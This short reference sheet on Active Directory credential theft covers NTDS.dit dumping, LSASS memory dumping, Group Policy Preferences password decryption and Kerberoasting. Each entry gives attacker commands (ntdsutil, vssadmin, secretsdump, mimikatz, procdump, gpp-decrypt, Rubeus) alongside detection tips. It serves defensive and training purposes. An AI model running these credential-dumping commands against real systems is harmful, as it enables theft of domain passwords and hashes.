1- NTDS.dit Dump (Domain Controller Password Hashes)

• Description:

  NTDS.dit contains all AD user password hashes. Attackers extract it to obtain domain credentials.

• Methods:

  • ntdsutil:

    ntdsutil "ac i ntds" "ifm" "create full <output_dir>" quit quit
    

  • Volume Shadow Copy:

    vssadmin create shadow /for=C:
    

    Access NTDS.dit from the shadow copy.

  • Impacket secretsdump:

    secretsdump.py domain/admin@dc_ip -hashes lmhash:nthash
    

• Detection:

  • Monitor access to NTDS.dit and shadow copies.
  • Event 4662 (replication requests) from non-DC accounts.

2- LSASS Memory Dump

• Description:

  LSASS stores credentials in memory; attackers dump it to extract hashes and plaintext passwords.

• Methods:

  • Mimikatz:

    mimikatz # sekurlsa::logonpasswords
    

  • ProcDump:

    procdump64.exe -ma lsass.exe lsass.dmp
    mimikatz # sekurlsa::minidump lsass.dmp
    mimikatz # sekurlsa::logonpasswords
    

• Detection:

  • Sysmon Event 10 (process dump of LSASS).
  • Enable Credential Guard to protect LSASS.

3- Group Policy Preferences (GPP) Passwords

• Description:

  Older Windows GPP stored plaintext credentials in XML files.

• Method:

  • Access GPP XMLs:

    \\\\<domain_controller>\\SYSVOL\\<domain>\\Policies\\
    

  • Decrypt:

    gpp-decrypt <encrypted_password>
    

• Detection:

  • Monitor access to GPP files.
  • Remove hardcoded credentials.

4- Kerberoasting

• Description:

  Extract service account passwords by requesting Kerberos TGS tickets and cracking offline.

• Method:

  Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
  Rubeus.exe kerberoast
  

  Crack tickets offline with Hashcat.

• Detection:

  • Event 4769 with unusual TGS requests or encryption types 0x17/0x18.
  • Abnormal TGS requests from non-service accounts.